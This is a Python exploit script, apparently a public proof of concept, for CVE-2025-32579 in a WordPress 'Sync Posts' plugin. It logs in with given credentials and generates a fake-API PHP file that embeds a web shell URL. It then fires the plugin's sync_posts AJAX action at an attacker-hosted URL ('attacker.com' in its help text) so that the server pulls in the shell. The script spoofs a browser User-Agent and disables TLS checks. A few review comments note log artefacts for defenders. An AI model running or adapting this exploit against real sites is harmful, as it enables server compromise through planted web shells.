import argparse
import requests
import urllib.parse
# Silence urllib3's warnings; with verification off (below) every HTTPS
# request would otherwise emit an InsecureRequestWarning.
requests.packages.urllib3.disable_warnings()

# One module-level session is shared by all requests so the cookies set by
# wp-login.php are replayed on the later admin-ajax.php call.
session = requests.Session()
# TLS certificate verification is disabled for every request on this session.
session.verify = False

# Fixed desktop-Chrome User-Agent sent with every request. For log review:
# this traffic does not announce itself as python-requests.
user_agent = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
    "AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/113.0.0.0 Safari/537.36"
)
def display_banner():
    """Print the tool's ASCII-art banner to stdout."""
    banner = """
@@@ @@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@
@@@@ @@@ @@@ @@@ @@@@@@@@ @@@ @@@@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@@
@@!@!@@@ @@! !@@ @@! @@@ @@! @@! @@@ @@! @@! @@! @@! @@@
!@!!@!@! !@! @!! !@! @!@ !@! !@! @!@ !@! !@! !@! !@! @!@
@!@ !!@! !@@!@! @!@@!@! @!! @!@ !@! !!@ @!! @!!!:! @!@ !@!
!@! !!! @!!! !!@!!! !!! !@! !!! !!! !!! !!!!!: !@! !!!
!!: !!! !: :!! !!: !!: !!: !!! !!: !!: !!: !!: !!!
:!: !:! :!: !:! :!: :!: :!: !:! :!: :!: :!: :!: !:!
:: :: :: ::: :: :: :::: ::::: :: :: :: :: :::: :::: ::
:: : : :: : : :: : : : : : : : : :: :: :: : :
"""
    print(banner)
def login_to_wordpress(url, username, password):
    """Submit the standard WordPress login form and report whether it worked.

    Posts ``log``/``pwd`` to ``<url>/wp-login.php`` through the shared
    module-level ``session``, so any cookies the site sets are kept for
    later requests.

    Args:
        url: Base URL of the WordPress site; a trailing slash is stripped.
        username: Account name sent in the ``log`` field.
        password: Password sent in the ``pwd`` field.

    Returns:
        True if the session holds a cookie whose name contains
        ``wordpress_logged_in`` after the POST, otherwise False.
    """
    endpoint = url.rstrip('/') + '/wp-login.php'
    form = {
        'log': username,
        'pwd': password,
        # Requests the long-lived "remember me" variant of the auth cookie.
        'rememberme': 'forever',
        'wp-submit': 'Log In',
    }

    print("NXPLOITED: Attempting login...")
    # The response body is not inspected; success is judged from cookies only.
    session.post(endpoint, data=form, headers={"User-Agent": user_agent})

    for cookie in session.cookies:
        if 'wordpress_logged_in' in cookie.name:
            print("NXPLOITED: Logged in successfully.")
            return True

    print("NXPLOITED: Failed to log in.")
    return False
def generate_fake_api(shell_url):
    """Return the source of a PHP stub that answers with one JSON "post".

    The stub sets a JSON content type and echoes an array holding a single
    record with ``id``, ``title.rendered`` and ``content.rendered`` keys.
    The rendered content is an ``<img>`` tag whose ``src`` is ``shell_url``.

    Args:
        shell_url: URL placed in the ``src`` attribute. It is inserted
            verbatim, with no escaping for the surrounding PHP string or
            HTML attribute.

    Returns:
        The PHP source as a single newline-joined string.
    """
    # NOTE(review): the record shape looks like a WordPress REST posts
    # response, presumably what the importing plugin expects. Confirm
    # against the plugin's code.
    php_lines = (
        "<?php",
        "header('Content-Type: application/json');",
        "echo json_encode([",
        "[",
        '"id" => 1,',
        '"title" => ["rendered" => "Nxploited"],',
        '"content" => [',
        f'"rendered" => "<img src=\'{shell_url}\'>"',
        "]",
        "]",
        "]);",
        "?>",
    )
    return "\n".join(php_lines)
def send_exploit_request(target_url, website_url):
    """POST the plugin's ``sync_posts`` AJAX action and print the outcome.

    Uses the shared ``session``, so the cookies obtained at login accompany
    the request. Nothing is returned; the result is reported on stdout only.

    What this looks like in the target's access logs: an authenticated POST
    to ``/wp-admin/admin-ajax.php`` with ``action=sync_posts`` and a
    ``website_url`` form field naming an external host, with a ``Referer``
    of the plugin's ``page=sync-posts`` admin screen.

    Args:
        target_url: Base URL of the WordPress site (used unmodified, so a
            trailing slash here yields a double slash in the request path).
        website_url: Value sent as ``website_url``, the remote source the
            plugin is asked to sync posts from.
    """
    # NOTE(review): presumably the plugin fetches website_url server-side and
    # stores media referenced by the returned posts. Outbound requests from
    # the web server and new files under uploads would be the artefacts to
    # check. Confirm against the plugin's code.
    form = {
        "website_url": website_url,
        "post_status": "pending",
        "num_posts": 1,
        "import_comments": 1,
        "author": 1,
        "action": "sync_posts",
    }
    # Header set imitates the browser XHR issued from the plugin's admin page.
    request_headers = {
        "User-Agent": user_agent,
        "Accept": "text/html, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"{target_url}/wp-admin/admin.php?page=sync-posts",
        "Origin": target_url,
        "Connection": "keep-alive",
    }
    ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    print(f"NXPLOITED: Sending exploit request to: {target_url}")
    try:
        reply = session.post(
            ajax_endpoint,
            headers=request_headers,
            data=urllib.parse.urlencode(form),
        )
        if reply.status_code != 200:
            print(f"NXPLOITED: Failed to send request. Status: {reply.status_code}")
            print(reply.text[:300])
        else:
            # HTTP 200 only shows the endpoint answered; the body preview is
            # printed so the operator can judge the actual result.
            print("NXPLOITED: Request sent successfully.")
            print(reply.text[:500])
    except Exception as exc:
        print(f"NXPLOITED: Error occurred while sending request: {exc}")
def main():
    """Command-line entry point.

    Prints the banner, parses five required options, writes the generated
    PHP stub to ``Khaled_alenazi.php`` in the current working directory,
    logs in to the target and, only if login succeeds, sends the
    ``sync_posts`` request.

    The stub is only written locally; nothing in this script serves or
    uploads it, so ``--website`` must already point at wherever it is hosted.
    """
    display_banner()

    cli = argparse.ArgumentParser(description="Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )")
    # (flags, help text) in the original declaration order; all are required.
    option_table = (
        (("-u", "--url"), "Target WordPress URL (e.g., http://target.com/wordpress)"),
        (("-un", "--username"), "Username to login"),
        (("-p", "--password"), "Password to login"),
        (("-ws", "--website"), "URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)"),
        (("-shell", "--webshell"), "Web shell URL used inside the fake API (can be a test image)"),
    )
    for flags, help_text in option_table:
        cli.add_argument(*flags, required=True, help=help_text)
    opts = cli.parse_args()

    stub_source = generate_fake_api(opts.webshell)
    with open("Khaled_alenazi.php", "w") as stub_file:
        stub_file.write(stub_source)
    print("NXPLOITED: Generated fake API PHP file: Khaled_alenazi.php")

    # The AJAX action is sent with the login cookies, so a failed login
    # stops the run here.
    if not login_to_wordpress(opts.url, opts.username, opts.password):
        print("NXPLOITED: Exploit aborted due to failed login.")
        return
    send_exploit_request(opts.url, opts.website)


if __name__ == "__main__":
    main()